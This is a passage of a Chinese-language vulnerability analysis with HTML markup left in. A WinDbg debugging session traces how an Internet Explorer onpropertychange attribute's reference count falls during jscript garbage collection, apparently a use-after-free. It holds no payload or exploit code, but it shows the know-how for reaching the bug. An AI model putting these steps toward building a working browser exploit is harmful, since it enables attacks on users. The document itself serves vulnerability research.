3.4.\u00a0\u00a0\u00a0\u00a0\u00a0 \u8c03\u8bd5\u5206\u6790\u65b9\u6cd5<\/h3>\n

\u5728JavaScript\u4e2d\u83b7\u53d6\u3001\u8bbe\u7f6e\u5c5e\u6027\u65f6\uff0c\u4f1a\u5148\u8c03\u7528mshtml!plaingetdispid\uff0c\u7136\u540e\u8c03\u7528mshtml!plaininvokeex\uff0c\u901a\u8fc7\u5bf9\u8fd9\u4e24\u4e2a\u51fd\u6570\u4e0b\u65ad\u70b9\uff0c\u53ef\u4ee5\u5bf9\u5e94\u5230\u6267\u884c\u7684JavaScript\u8bed\u53e5\u3002<\/p>\n

\u9996\u5148\u4e0b\u65ad\u70b9\u5230\u7b2c\u4e00\u6b21\u4e3aonpropertychange\u5c5e\u6027\u8d4b\u503c\u7684\u5730\u65b9<\/p>\n

\n
\n\n\n\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n
56<\/div>\n
57<\/div>\n
58<\/div>\n
59<\/div>\n
60<\/div>\n
61<\/div>\n
62<\/div>\n
63<\/div>\n
64<\/div>\n
65<\/div>\n
66<\/div>\n
67<\/div>\n
68<\/div>\n
69<\/div>\n
70<\/div>\n
71<\/div>\n
72<\/div>\n
73<\/div>\n
74<\/div>\n
75<\/div>\n
76<\/div>\n
77<\/div>\n
78<\/div>\n
79<\/div>\n
80<\/div>\n
81<\/div>\n
82<\/div>\n
83<\/div>\n
84<\/div>\n
85<\/div>\n
86<\/div>\n
87<\/div>\n
88<\/div>\n
89<\/div>\n
90<\/div>\n
91<\/div>\n
92<\/div>\n
93<\/div>\n
94<\/div>\n
95<\/div>\n
96<\/div>\n
97<\/div>\n
98<\/div>\n
99<\/div>\n
100<\/div>\n
101<\/div>\n
102<\/div>\n
103<\/div>\n
104<\/div>\n
105<\/div>\n
106<\/div>\n
107<\/div>\n
108<\/div>\n
109<\/div>\n
110<\/div>\n
111<\/div>\n
112<\/div>\n
113<\/div>\n
114<\/div>\n
115<\/div>\n
116<\/div>\n
117<\/div>\n
118<\/div>\n
119<\/div>\n
120<\/div>\n
121<\/div>\n
122<\/div>\n
123<\/div>\n
124<\/div>\n
125<\/div>\n
126<\/div>\n
127<\/div>\n
128<\/div>\n
129<\/div>\n
130<\/div>\n
131<\/div>\n
132<\/div>\n
133<\/div>\n
134<\/div>\n
135<\/div>\n
136<\/div>\n
137<\/div>\n
138<\/div>\n
139<\/div>\n
140<\/div>\n
141<\/div>\n
142<\/div>\n
143<\/div>\n
144<\/div>\n
145<\/div>\n
146<\/div>\n
147<\/div>\n
148<\/div>\n
149<\/div>\n
150<\/div>\n
151<\/div>\n
152<\/div>\n
153<\/div>\n
154<\/div>\n
155<\/div>\n
156<\/div>\n
157<\/div>\n
158<\/div>\n
159<\/div>\n
160<\/div>\n
161<\/div>\n
162<\/div>\n
163<\/div>\n
164<\/div>\n
165<\/div>\n
166<\/div>\n
167<\/div>\n
168<\/div>\n
169<\/div>\n
170<\/div>\n
171<\/div>\n
172<\/div>\n
173<\/div>\n
174<\/div>\n
175<\/div>\n
176<\/div>\n
177<\/div>\n
178<\/div>\n
179<\/div>\n
180<\/div>\n
181<\/div>\n
182<\/div>\n
183<\/div>\n
184<\/div>\n
185<\/div>\n
186<\/div>\n
187<\/div>\n
188<\/div>\n
189<\/div>\n
190<\/div>\n
191<\/div>\n
192<\/div>\n
193<\/div>\n
194<\/div>\n
195<\/div>\n
196<\/div>\n
197<\/div>\n
198<\/div>\n
199<\/div>\n
200<\/div>\n
201<\/div>\n
202<\/div>\n
203<\/div>\n
204<\/div>\n
205<\/div>\n
206<\/div>\n
207<\/div>\n
208<\/div>\n
209<\/div>\n
210<\/div>\n
211<\/div>\n
212<\/div>\n
213<\/div>\n
214<\/div>\n
215<\/div>\n
216<\/div>\n
217<\/div>\n
218<\/div>\n
219<\/div>\n
220<\/div>\n
221<\/div>\n
222<\/div>\n
223<\/div>\n
224<\/div>\n
225<\/div>\n
226<\/div>\n
227<\/div>\n
228<\/div>\n
229<\/div>\n
230<\/div>\n
231<\/div>\n
232<\/div>\n
233<\/div>\n
234<\/div>\n
235<\/div>\n
236<\/div>\n
237<\/div>\n
238<\/div>\n
239<\/div>\n
240<\/div>\n
241<\/div>\n
242<\/div>\n
243<\/div>\n
244<\/div>\n
245<\/div>\n
246<\/div>\n
247<\/div>\n
248<\/div>\n
249<\/div>\n
250<\/div>\n
251<\/div>\n
252<\/div>\n
253<\/div>\n
254<\/div>\n
255<\/div>\n
256<\/div>\n
257<\/div>\n
258<\/div>\n
259<\/div>\n
260<\/div>\n
261<\/div>\n
262<\/div>\n
263<\/div>\n
264<\/div>\n
265<\/div>\n
266<\/div>\n
267<\/div>\n
268<\/div>\n
269<\/div>\n
270<\/div>\n
271<\/div>\n
272<\/div>\n
273<\/div>\n
274<\/div>\n
275<\/div>\n
276<\/div>\n
277<\/div>\n
278<\/div>\n
279<\/div>\n
280<\/div>\n
281<\/div>\n
282<\/div>\n
283<\/div>\n
284<\/div>\n
285<\/div>\n
286<\/div>\n
287<\/div>\n
288<\/div>\n
289<\/div>\n
290<\/div>\n
291<\/div>\n
292<\/div>\n
293<\/div>\n
294<\/div>\n
295<\/div>\n
296<\/div>\n
297<\/div>\n
298<\/div>\n
299<\/div>\n
300<\/div>\n
301<\/div>\n
302<\/div>\n
303<\/div>\n
304<\/div>\n
305<\/div>\n
306<\/div>\n
307<\/div>\n
308<\/div>\n
309<\/div>\n
310<\/div>\n
311<\/div>\n
312<\/div>\n
313<\/div>\n
314<\/div>\n
315<\/div>\n
316<\/div>\n
317<\/div>\n
318<\/div>\n
319<\/div>\n
320<\/div>\n
321<\/div>\n
322<\/div>\n
323<\/div>\n
324<\/div>\n
325<\/div>\n
326<\/div>\n
327<\/div>\n
328<\/div>\n
329<\/div>\n
330<\/div>\n
331<\/div>\n
332<\/div>\n
333<\/div>\n
334<\/div>\n
335<\/div>\n
336<\/div>\n
337<\/div>\n
338<\/div>\n
339<\/div>\n
340<\/div>\n
341<\/div>\n
342<\/div>\n
343<\/div>\n
344<\/div>\n
345<\/div>\n
346<\/div>\n
347<\/div>\n
348<\/div>\n
349<\/div>\n
350<\/div>\n
351<\/div>\n
352<\/div>\n
353<\/div>\n
354<\/div>\n
355<\/div>\n
356<\/div>\n
357<\/div>\n
358<\/div>\n
359<\/div>\n
360<\/div>\n
361<\/div>\n
362<\/div>\n
363<\/div>\n
364<\/div>\n
365<\/div>\n
366<\/div>\n
367<\/div>\n
368<\/div>\n
369<\/div>\n
370<\/div>\n
371<\/div>\n
372<\/div>\n
373<\/div>\n
374<\/div>\n
375<\/div>\n
376<\/div>\n
377<\/div>\n
378<\/div>\n
379<\/div>\n
380<\/div>\n
381<\/div>\n
382<\/div>\n
383<\/div>\n
384<\/div>\n
385<\/div>\n
386<\/div>\n
387<\/div>\n
388<\/div>\n
389<\/div>\n
390<\/div>\n
391<\/div>\n
392<\/div>\n
393<\/div>\n
394<\/div>\n
395<\/div>\n
396<\/div>\n
397<\/div>\n
398<\/div>\n
399<\/div>\n
400<\/div>\n
401<\/div>\n
402<\/div>\n
403<\/div>\n
404<\/div>\n
405<\/div>\n
406<\/div>\n
407<\/div>\n
408<\/div>\n
409<\/div>\n
410<\/div>\n
411<\/div>\n
412<\/div>\n
413<\/div>\n
414<\/div>\n
415<\/div>\n
416<\/div>\n
417<\/div>\n
418<\/div>\n
419<\/div>\n
420<\/div>\n
421<\/div>\n
422<\/div>\n
423<\/div>\n
424<\/div>\n
425<\/div>\n
426<\/div>\n
427<\/div>\n
428<\/div>\n
429<\/div>\n
430<\/div>\n
431<\/div>\n
432<\/div>\n
433<\/div>\n
434<\/div>\n
435<\/div>\n
436<\/div>\n
437<\/div>\n
438<\/div>\n
439<\/div>\n
440<\/div>\n
441<\/div>\n
442<\/div>\n
443<\/div>\n
444<\/div>\n
445<\/div>\n
446<\/div>\n
447<\/div>\n
448<\/div>\n
449<\/div>\n
450<\/div>\n
451<\/div>\n
452<\/div>\n
453<\/div>\n
454<\/div>\n
455<\/div>\n
456<\/div>\n
457<\/div>\n
458<\/div>\n
459<\/div>\n
460<\/div>\n
461<\/div>\n
462<\/div>\n
463<\/div>\n
464<\/div>\n
465<\/div>\n
466<\/div>\n
467<\/div>\n
468<\/div>\n
469<\/div>\n
470<\/div>\n
471<\/div>\n
472<\/div>\n
473<\/div>\n
474<\/div>\n
475<\/div>\n
476<\/div>\n
477<\/div>\n
478<\/div>\n
479<\/div>\n
480<\/div>\n
481<\/div>\n
482<\/div>\n
483<\/div>\n
484<\/div>\n
485<\/div>\n
486<\/div>\n
487<\/div>\n
488<\/div>\n
489<\/div>\n
490<\/div>\n
491<\/div>\n
492<\/div>\n
493<\/div>\n
494<\/div>\n
495<\/div>\n
496<\/div>\n
497<\/div>\n
498<\/div>\n
499<\/div>\n
500<\/div>\n
501<\/div>\n
502<\/div>\n
503<\/div>\n
504<\/div>\n
505<\/div>\n
506<\/div>\n
507<\/div>\n
508<\/div>\n
509<\/div>\n
510<\/div>\n
511<\/div>\n
512<\/div>\n
513<\/div>\n
514<\/div>\n
515<\/div>\n
516<\/div>\n
517<\/div>\n
518<\/div>\n
519<\/div>\n
520<\/div>\n
521<\/div>\n
522<\/div>\n
523<\/div>\n
524<\/div>\n
525<\/div>\n
526<\/div>\n
527<\/div>\n
528<\/div>\n
529<\/div>\n
530<\/div>\n
531<\/div>\n
532<\/div>\n
533<\/div>\n
534<\/div>\n
535<\/div>\n
536<\/div>\n
537<\/div>\n
538<\/div>\n
539<\/div>\n
540<\/div>\n
541<\/div>\n
542<\/div>\n
543<\/div>\n
544<\/div>\n
545<\/div>\n
546<\/div>\n
547<\/div>\n
548<\/div>\n
549<\/div>\n
550<\/div>\n
551<\/div>\n
552<\/div>\n
553<\/div>\n
554<\/div>\n
555<\/div>\n
556<\/div>\n
557<\/div>\n
558<\/div>\n
559<\/div>\n
560<\/div>\n
561<\/div>\n
562<\/div>\n
563<\/div>\n
564<\/div>\n
565<\/div>\n
566<\/div>\n
567<\/div>\n
568<\/div>\n
569<\/div>\n
570<\/div>\n
571<\/div>\n
572<\/div>\n
573<\/div>\n
574<\/div>\n
575<\/div>\n
576<\/div>\n
577<\/div>\n
578<\/div>\n
579<\/div>\n
580<\/div>\n
581<\/div>\n
582<\/div>\n
583<\/div>\n
584<\/div>\n
585<\/div>\n
586<\/div>\n
587<\/div>\n
588<\/div>\n
589<\/div>\n
590<\/div>\n
591<\/div>\n
592<\/div>\n
593<\/div>\n
594<\/div>\n
595<\/div>\n
596<\/div>\n
597<\/div>\n
598<\/div>\n
599<\/div>\n
600<\/div>\n
601<\/div>\n
602<\/div>\n
603<\/div>\n
604<\/div>\n
605<\/div>\n
606<\/div>\n
607<\/div>\n
608<\/div>\n
609<\/div>\n
610<\/div>\n
611<\/div>\n
612<\/div>\n
613<\/div>\n
614<\/div>\n
615<\/div>\n
616<\/div>\n
617<\/div>\n
618<\/div>\n
619<\/div>\n
620<\/div>\n
621<\/div>\n
622<\/div>\n
623<\/div>\n
624<\/div>\n
625<\/div>\n
626<\/div>\n
627<\/div>\n
628<\/div>\n
629<\/div>\n
630<\/div>\n
631<\/div>\n
632<\/div>\n
633<\/div>\n
634<\/div>\n
635<\/div>\n
636<\/div>\n
637<\/div>\n
638<\/div>\n
639<\/div>\n
640<\/div>\n
641<\/div>\n
642<\/div>\n
643<\/div>\n
644<\/div>\n
645<\/div>\n
646<\/div>\n
647<\/div>\n
648<\/div>\n
649<\/div>\n
650<\/div>\n
651<\/div>\n
652<\/div>\n
653<\/div>\n
654<\/div>\n
655<\/div>\n
656<\/div>\n
657<\/div>\n
658<\/div>\n
659<\/div>\n
660<\/div>\n
661<\/div>\n
662<\/div>\n
663<\/div>\n
664<\/div>\n
665<\/div>\n
666<\/div>\n
667<\/div>\n
668<\/div>\n
669<\/div>\n
670<\/div>\n
671<\/div>\n
672<\/div>\n
673<\/div>\n
674<\/div>\n
675<\/div>\n
676<\/div>\n
677<\/div>\n<\/td>\n
\n
\n
0:012> bp mshtml!plaingetdispid \"du poi(esp+8);as \/mu method poi(esp+8);.block{j($scmp(\\\"${method}\\\",\\\"onpropertychange\\\")=0) '';'gc'}\"<\/code><\/div>\n
<\/div>\n
0:012> bl<\/code><\/div>\n
<\/div>\n
0 e 6a7cc9d1\u00a0\u00a0\u00a0\u00a0 0001 (0001)\u00a0 0:**** mshtml!PlainGetDispID \"du poi(esp+8);as \/mu method poi(esp+8);.block{j($scmp(\\\"${method}\\\",\\\"onpropertychange\\\")=0) '';'gc'}\"<\/code><\/div>\n
<\/div>\n
2 d 6a77bb85\u00a0\u00a0\u00a0\u00a0 0001 (0001)\u00a0 0:**** mshtml!PlainInvokeEx<\/code><\/div>\n
<\/div>\n
\u7136\u540eF5\u8fd0\u884c<\/code><\/div>\n
<\/div>\n
0175b65c\u00a0 \"createElement\"<\/code><\/div>\n
<\/div>\n
0175b65c\u00a0 \"createElement\"<\/code><\/div>\n
<\/div>\n
0175b690\u00a0 \"body\"<\/code><\/div>\n
<\/div>\n
0175b6a4\u00a0 \"appendChild\"<\/code><\/div>\n
<\/div>\n
0175b690\u00a0 \"body\"<\/code><\/div>\n
<\/div>\n
0175b6a4\u00a0 \"appendChild\"<\/code><\/div>\n
<\/div>\n
0175b6f0\u00a0 \"attributes\"<\/code><\/div>\n
<\/div>\n
0175b6c4\u00a0 \"onpropertychange\"<\/code><\/div>\n
<\/div>\n
eax=6a7cc9d1 ebx=10000003 ecx=020ca2a0 edx=0175b6c4 esi=001aba30 edi=0066c6c0<\/code><\/div>\n
<\/div>\n
eip=6a7cc9d1 esp=020ca238 ebp=020ca264 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!PlainGetDispID:<\/code><\/div>\n
<\/div>\n
6a7cc9d1 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
\u7136\u540e\u6253\u5f00\u7b2c\u4e8c\u4e2a\u65ad\u70b9<\/code><\/div>\n
<\/div>\n
0:005> be 2<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
<\/div>\n
Breakpoint 2 hit<\/code><\/div>\n
<\/div>\n
eax=8001179f ebx=0066c6c0 ecx=6a77bb85 edx=0000000c esi=020ca16c edi=00000000<\/code><\/div>\n
<\/div>\n
eip=6a77bb85 esp=020ca140 ebp=020ca178 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!PlainInvokeEx:<\/code><\/div>\n
<\/div>\n
6a77bb85 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
0:005> pc<\/code><\/div>\n
<\/div>\n
eax=6a6d0a90 ebx=00001200 ecx=6a7599dc edx=0066c750 esi=0066c6c0 edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a77bc0b esp=020ca0f0 ebp=020ca13c iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na po nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000202<\/code><\/div>\n
<\/div>\n
mshtml!PlainInvokeEx+0xcc:<\/code><\/div>\n
<\/div>\n
6a77bc0b ff5038\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call\u00a0\u00a0\u00a0 dword ptr [eax+38h]\u00a0 ds:0023:6a6d0ac8={mshtml!CElement::VersionedInvokeEx (6a7da6d8)}<\/code><\/div>\n
<\/div>\n
0:005> t<\/code><\/div>\n
<\/div>\n
eax=6a6d0a90 ebx=00001200 ecx=6a7599dc edx=0066c750 esi=0066c6c0 edi=00000001<\/code><\/div>\n
<\/div>\n
eip=6a7da6d8 esp=020ca0ec ebp=020ca13c iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na po nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000202<\/code><\/div>\n
<\/div>\n
mshtml!CElement::VersionedInvokeEx:<\/code><\/div>\n
<\/div>\n
6a7da6d8 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
0:005> dd esp<\/code><\/div>\n
<\/div>\n
020ca0ec\u00a0 6a77bc0e 0066c750 8001179f 00000001<\/code><\/div>\n
<\/div>\n
020ca0fc\u00a0 0000000c 020ca240 00000000 020ca250<\/code><\/div>\n
<\/div>\n
020ca10c\u00a0 0175f858 0066c6c0 00000001 efa18903<\/code><\/div>\n
<\/div>\n
020ca11c\u00a0 6a922a90 00000000 020ca16c 0066c6c0<\/code><\/div>\n
<\/div>\n
020ca12c\u00a0 017ccab0 00000001 efa18903 00000000<\/code><\/div>\n
<\/div>\n
020ca13c \u00a0020ca178 66cfa26e 0066c6c0 8001179f<\/code><\/div>\n
<\/div>\n
020ca14c\u00a0 00000001 0000000c 020ca240 00000000<\/code><\/div>\n
<\/div>\n
020ca15c\u00a0 020ca250 0175f858 8001179f 001aba30<\/code><\/div>\n
<\/div>\n
0:005> dds 0066c750<\/code><\/div>\n
<\/div>\n
0066c750\u00a0 6a6d0a90 mshtml!CDivElement::`vftable'<\/code><\/div>\n
<\/div>\n
0066c754\u00a0 00000004<\/code><\/div>\n
<\/div>\n
0066c758\u00a0 00000008<\/code><\/div>\n
<\/div>\n
0066c75c\u00a0 00663ff8\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u6307\u5411div\u5bf9\u8c61\u7684\u5c5e\u6027\u6570\u7ec4<\/code><\/div>\n
<\/div>\n
0066c760\u00a0 001aefa0<\/code><\/div>\n
<\/div>\n
0066c764\u00a0 005e2af8<\/code><\/div>\n
<\/div>\n
0066c768\u00a0 0000001f<\/code><\/div>\n
<\/div>\n
0066c76c\u00a0 00010200<\/code><\/div>\n
<\/div>\n
0:005> dd 00663ff8<\/code><\/div>\n
<\/div>\n
00663ff8\u00a0 6a5aa594 00000004 00000004 005fba58<\/code><\/div>\n
<\/div>\n
00664008\u00a0 00000000 00000000 2d11148b 80000068<\/code><\/div>\n
<\/div>\n
00664018\u00a0 554d00c6 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
00664028\u00a0 00000000 00000000 2d11148f 8000006c<\/code><\/div>\n
<\/div>\n
00664038\u00a0 007700ca 00740061 00680063 002d0020<\/code><\/div>\n
<\/div>\n
00664048\u00a0 00380020 00200029 2d111483 80000066<\/code><\/div>\n
<\/div>\n
00664058\u00a0 006800ce 006c0065 006f006c 0065006b<\/code><\/div>\n
<\/div>\n
00664068\u00a0 00280079 00650074 2d111487 8000006b<\/code><\/div>\n
<\/div>\n
005fba58\u6307\u5411\u5c5e\u6027\u6570\u7ec4\uff0c\u6bcf\u4e2a\u5c5e\u602716\u4e2a\u5b57\u8282\u5927\u5c0f<\/code><\/div>\n
<\/div>\n
0:005> dd 005fba58<\/code><\/div>\n
<\/div>\n
005fba58\u00a0 00001a03 8001145a 00000000 005f4178<\/code><\/div>\n
<\/div>\n
\u6b64\u59048001145a\u4e3aattributes\u7684dispid\uff0c005f4178\u4e3a\u6307\u5411attributes\u5c5e\u6027\u7684\u63a5\u53e3\u6307\u9488<\/code><\/div>\n
<\/div>\n
005fba68\u00a0 000000d9 00000018 00000184 00000020<\/code><\/div>\n
<\/div>\n
005fba78\u00a0 00000269 00000020 00000000 00000266<\/code><\/div>\n
<\/div>\n
005fba88\u00a0 000002f6 00000556 00000000 00000556<\/code><\/div>\n
<\/div>\n
005fba98\u00a0 2d2b0aaa 8c000033 75a49854 6c90338c<\/code><\/div>\n
<\/div>\n
005fbaa8\u00a0 00000001 005fcee4 005fcbb0 6c9050a0<\/code><\/div>\n
<\/div>\n
0:005> bd 2<\/code><\/div>\n
<\/div>\n
\/\/\u8fd4\u56de\u5230jscript\u6a21\u5757<\/code><\/div>\n
<\/div>\n
0:005> g 0x`66cfa26e<\/code><\/div>\n
<\/div>\n
eax=00000000 ebx=0066c6c0 ecx=0175f858 edx=00000000 esi=020ca16c edi=00000000<\/code><\/div>\n
<\/div>\n
eip=66cfa26e esp=020ca164 ebp=020ca178 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
jscript!IDispatchExInvokeEx2+0x104:<\/code><\/div>\n
<\/div>\n
66cfa26e 8d75f4\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 lea\u00a0\u00a0\u00a0\u00a0 esi,[ebp-0Ch]<\/code><\/div>\n
<\/div>\n
\/\/\u67e5\u770bdiv\u5c5e\u6027\u6570\u7ec4\u7684\u5185\u5bb9<\/code><\/div>\n
<\/div>\n
0:005> dd 005fba58<\/code><\/div>\n
<\/div>\n
005fba58 \u00a000001a03 8001145a 00000000 005f4178<\/code><\/div>\n
<\/div>\n
005fba68\u00a0 00200903 8001179f 00000000 0066c830<\/code><\/div>\n
<\/div>\n
005fba78\u00a0 00000d08 800117c4 00000000 00661180<\/code><\/div>\n
<\/div>\n
005fba88\u00a0 000002f6 00000556 00000000 00000556<\/code><\/div>\n
<\/div>\n
005fba98\u00a0 2d2b0aaa 8c000033 75a49854 6c90338c<\/code><\/div>\n
<\/div>\n
\u7b2c\u4e8c\u884c8001179f\u4e3aonpropertychange\u7684dispid\uff0c0066c830\u4e3a\u63a5\u53e3\u6307\u9488\uff0c\u5b9e\u9645\u4e0a\u662f\u6307\u5411TEAROFF_THUNK\u7ed3\u6784\u7684\u6307\u9488\uff0c\u6b64\u65f6\u5f15\u7528\u8ba1\u6570\u4e3a3<\/code><\/div>\n
<\/div>\n
0:005> dd 0066c830 l10<\/code><\/div>\n
<\/div>\n
0066c830\u00a0 6aadbdc8 00000003 6a775d74 005f4178<\/code><\/div>\n
<\/div>\n
0066c840\u00a0 6a5e77d0 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
0066c850\u00a0 03000013 00000000 2d117bc2 88000000<\/code><\/div>\n
<\/div>\n
0066c860\u00a0 6aadcaf0 00000000 6a757be0 0066c750<\/code><\/div>\n
<\/div>\n
\u4e0b\u9762\u7684\u5faa\u73af\u76ee\u7684\u662f\u89e6\u53d1\u5783\u573e\u56de\u6536\uff0c\u53ef\u4ee5\u5bf966c834\u5730\u5740\u4e0b\u786c\u4ef6\u5199\u5165\u65ad\u70b9\uff0c\u8ffd\u8e2a\u8be5\u5185\u5b58\u3002<\/code><\/div>\n
<\/div>\n
0:005> ba w4 0066c834<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
<\/div>\n
0175b6f0\u00a0 \"attributes\"<\/code><\/div>\n
<\/div>\n
0175b6c4\u00a0 \"onpropertychange\"<\/code><\/div>\n
<\/div>\n
eax=6a7cc9d1 ebx=10000003 ecx=020ca2a0 edx=0175b6c4 esi=001aba30 edi=0066c720<\/code><\/div>\n
<\/div>\n
eip=6a7cc9d1 esp=020ca238 ebp=020ca264 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl zr na pe nc<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000246<\/code><\/div>\n
<\/div>\n
mshtml!PlainGetDispID:<\/code><\/div>\n
<\/div>\n
6a7cc9d1 8bff\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 edi,edi<\/code><\/div>\n
<\/div>\n
0:005> g<\/code><\/div>\n
<\/div>\n
Breakpoint 1 hit<\/code><\/div>\n
<\/div>\n
eax=0066c830 ebx=001aef10 ecx=6aadbdc8 edx=6a7578d5 esi=0066c830 edi=01751e60<\/code><\/div>\n
<\/div>\n
eip=6a7578e1 esp=020ca144 ebp=020ca148 iopl=0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nv up ei pl nz na po cy<\/code><\/div>\n
<\/div>\n
cs=001b\u00a0 ss=0023\u00a0 ds=0023\u00a0 es=0023\u00a0 fs=003b\u00a0 gs=0000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 efl=00000203<\/code><\/div>\n
<\/div>\n
mshtml!PlainRelease+0xc:<\/code><\/div>\n
<\/div>\n
6a7578e1 8b4604\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov\u00a0\u00a0\u00a0\u00a0 eax,dword ptr [esi+4] ds:0023:0066c834=00000002<\/code><\/div>\n
<\/div>\n
0:005> kb<\/code><\/div>\n
<\/div>\n
ChildEBP RetAddr\u00a0 Args to Child<\/code><\/div>\n
<\/div>\n
020ca148 66cfa735 0066c830 01751e60 00000001 mshtml!PlainRelease+0xc<\/code><\/div>\n
<\/div>\n
020ca158 66d1444c 001ab9a0 001a2e50 01755008 jscript!VAR::Clear+0x5f<\/code><\/div>\n
<\/div>\n
020ca180 66d16e46 00000000 00000000 005d1be0 jscript!GcAlloc::ReclaimGarbage+0x94<\/code><\/div>\n
<\/div>\n
020ca19c 66d143e9 00000002 020ca210 00000000 jscript!GcContext::Reclaim+0xb6<\/code><\/div>\n
<\/div>\n
020ca1b0 66d142e9 020ca210 0176d350 001abd28 jscript!GcContext::CollectCore+0x123<\/code><\/div>\n
<\/div>\n
020ca1c4 66d783f0 020ca220 66d0599a 001aba30 jscript!GcContext::Collect+0x3a<\/code><\/div>\n
<\/div>\n
020ca1cc 66d0599a 001aba30 020ca270 020ca210 jscript!JsCollectGarbage+0x1d<\/code><\/div>\n
<\/div>\n
020ca234 66d0758c 00000000 00000000 0175f090 jscript!NatFncObj::Call+0x106<\/code><\/div>\n
<\/div>\n
020ca2b8 66d04f84 001abd28 001aba30 00000001 jscript!NameTbl::InvokeInternal+0x141<\/code><\/div>\n
<\/div>\n
\u4e2d\u65ad\u4e24\u6b21\u540e\u5f15\u7528\u8ba1\u6570\u53d8\u4e3a1<\/code><\/div>\n
<\/div>\n
0:005> dd 0066c830 l10<\/code><\/div>\n
<\/div>\n
0066c830\u00a0 6aadbdc8 00000001 6a775d74 005f4178<\/code><\/div>\n
<\/div>\n
0066c840\u00a0 6a5e77d0 00000000 00000000 00000000<\/code><\/div>\n
<\/div>\n
0066c850\u00a0 03000013 00000000 2d117bc2 88000000<\/code><\/div>\n
<\/div>\n
0066c860\u00a0 6aadbdc8 00000001 6a775d74 00628600<\/code><\/div>\n
<\/div>\n
